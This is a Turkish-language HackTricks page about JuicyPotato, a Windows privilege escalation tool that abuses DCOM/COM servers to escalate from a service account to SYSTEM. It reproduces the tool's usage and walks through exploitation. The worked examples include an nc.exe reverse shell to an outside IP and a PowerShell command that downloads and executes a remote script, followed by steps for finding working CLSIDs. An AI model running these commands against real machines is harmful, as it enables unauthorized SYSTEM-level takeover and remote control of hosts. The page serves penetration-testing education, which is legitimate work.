hacktricks/windows-hardening/windows-local-privilege-escalation/juicypotato.md

JuicyPotato

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live bizi takip edin.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

{% endhint %}

WhiteIntel

WhiteIntel, bir şirketin veya müşterilerinin zararlı yazılımlar tarafından tehdit edilip edilmediğini kontrol etmek için ücretsiz işlevsellikler sunan karanlık ağ destekli bir arama motorudur.

WhiteIntel'in ana hedefi, bilgi çalan zararlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.

Web sitelerini kontrol edebilir ve motorlarını ücretsiz deneyebilirsiniz:

{% embed url="https://whiteintel.io" %}

---

{% hint style="warning" %} JuicyPotato, Windows Server 2019 ve Windows 10 build 1809 ve sonrasında çalışmaz. Ancak, PrintSpoofer, RoguePotato, SharpEfsPotato ile aynı ayrıcalıkları kullanarak NT AUTHORITY\SYSTEM düzeyinde erişim elde edebilirsiniz. Kontrol Et: {% endhint %}

{% content-ref url="roguepotato-and-printspoofer.md" %} roguepotato-and-printspoofer.md {% endcontent-ref %}

Juicy Potato (altın ayrıcalıkları kötüye kullanma)

Biraz meyve suyu eklenmiş RottenPotatoNG, yani Windows Servis Hesaplarından NT AUTHORITY\SYSTEM'e başka bir Yerel Ayrıcalık Yükseltme aracı

Juicypotato'yu https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts adresinden indirebilirsiniz.

Özet

juicy-potato Readme'den:

RottenPotatoNG ve onun varyantları, BITS servisi temelinde ayrıcalık yükseltme zincirini kullanır ve 127.0.0.1:6666 üzerinde MiTM dinleyicisi vardır ve SeImpersonate veya SeAssignPrimaryToken ayrıcalıklarına sahip olduğunuzda çalışır. Bir Windows build incelemesi sırasında, BITS'in kasıtlı olarak devre dışı bırakıldığı ve 6666 portunun alındığı bir kurulum bulduk.

RottenPotatoNG'yi silahlandırmaya karar verdik: Juicy Potato'ya merhaba deyin.

Teori için, Rotten Potato - Hizmet Hesaplarından SYSTEM'e Ayrıcalık Yükseltme sayfasını inceleyin ve bağlantılar ve referanslar zincirini takip edin.

BITS dışında, kötüye kullanabileceğimiz birkaç COM sunucusu olduğunu keşfettik. Bunların sadece:

1. mevcut kullanıcı tarafından örneklendirilebilir olması, genellikle taklit ayrıcalıklarına sahip bir "hizmet kullanıcısı"
2. IMarshal arayüzünü uygulaması
3. yükseltilmiş bir kullanıcı (SYSTEM, Yönetici, ...) olarak çalışması gerekir.

Biraz test yaptıktan sonra, birkaç Windows sürümünde ilginç CLSID'lerin kapsamlı bir listesini elde ettik ve test ettik.

Juicy detaylar

JuicyPotato, size şunları sağlar:

• Hedef CLSID istediğiniz herhangi bir CLSID'yi seçin. Burada işletim sistemine göre düzenlenmiş listeyi bulabilirsiniz.
• COM Dinleme portu tercih ettiğiniz COM dinleme portunu tanımlayın (hardcoded 6666 yerine)
• COM Dinleme IP adresi sunucuyu herhangi bir IP'ye bağlayın
• İşlem oluşturma modu taklit edilen kullanıcının ayrıcalıklarına bağlı olarak şunlardan birini seçebilirsiniz:
• CreateProcessWithToken (gerekli SeImpersonate)
• CreateProcessAsUser (gerekli SeAssignPrimaryToken)
• her ikisi
• Başlatılacak işlem sömürü başarılı olursa bir yürütülebilir dosya veya betik başlatın
• İşlem Argümanı başlatılan işlem argümanlarını özelleştirin
• RPC Sunucu adresi gizli bir yaklaşım için harici bir RPC sunucusuna kimlik doğrulaması yapabilirsiniz
• RPC Sunucu portu harici bir sunucuya kimlik doğrulaması yapmak istiyorsanız ve güvenlik duvarı 135 portunu engelliyorsa…
• TEST modu _temelde test amaçlıdır, yani CLSID'leri test etmek için. DCOM oluşturur ve token kullanıcısını yazdırır. _test için buraya bakın

Kullanım

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Final thoughts

From juicy-potato Readme:

Eğer kullanıcının SeImpersonate veya SeAssignPrimaryToken ayrıcalıkları varsa, o zaman SYSTEM'siniz.

Bu COM Sunucularının kötüye kullanımını önlemek neredeyse imkansızdır. Bu nesnelerin izinlerini DCOMCNFG aracılığıyla değiştirmeyi düşünebilirsiniz ama iyi şanslar, bu zorlayıcı olacak.

Gerçek çözüm, * SERVICE hesapları altında çalışan hassas hesapları ve uygulamaları korumaktır. DCOM'u durdurmak kesinlikle bu istismarı engelleyecektir ancak temel işletim sistemi üzerinde ciddi bir etki yaratabilir.

From: http://ohpe.it/juicy-potato/

Examples

Note: Visit this page for a list of CLSIDs to try.

Get a nc.exe reverse shell

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell rev

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Yeni bir CMD başlatın (eğer RDP erişiminiz varsa)

CLSID Problemleri

Çoğu zaman, JuicyPotato'nun kullandığı varsayılan CLSID çalışmaz ve exploit başarısız olur. Genellikle, çalışan bir CLSID bulmak için birden fazla deneme gerekir. Belirli bir işletim sistemi için denemek üzere CLSID'lerin bir listesini almak için bu sayfayı ziyaret etmelisiniz:

{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}

CLSID'leri Kontrol Etme

Öncelikle, juicypotato.exe dışında bazı çalıştırılabilir dosyalara ihtiyacınız olacak.

Join-Object.ps1 dosyasını indirin ve PS oturumunuza yükleyin, ardından GetCLSID.ps1 dosyasını indirin ve çalıştırın. Bu script, test edilecek olası CLSID'lerin bir listesini oluşturacaktır.

Sonra test_clsid.bat dosyasını indirin (CLSID listesi ve juicypotato çalıştırılabilir dosyası için yolu değiştirin) ve çalıştırın. Her CLSID'yi denemeye başlayacaktır ve port numarası değiştiğinde, bu CLSID'nin çalıştığı anlamına gelecektir.

Çalışan CLSID'leri -c parametresini kullanarak kontrol edin

Referanslar

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel dark-web destekli bir arama motorudur ve bir şirketin veya müşterilerinin stealer malwares tarafından tehdit edilip edilmediğini kontrol etmek için ücretsiz işlevsellikler sunar.

WhiteIntel'in ana hedefi, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.

Web sitelerini kontrol edebilir ve motorlarını ücretsiz deneyebilirsiniz:

{% embed url="https://whiteintel.io" %}

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

{% endhint %}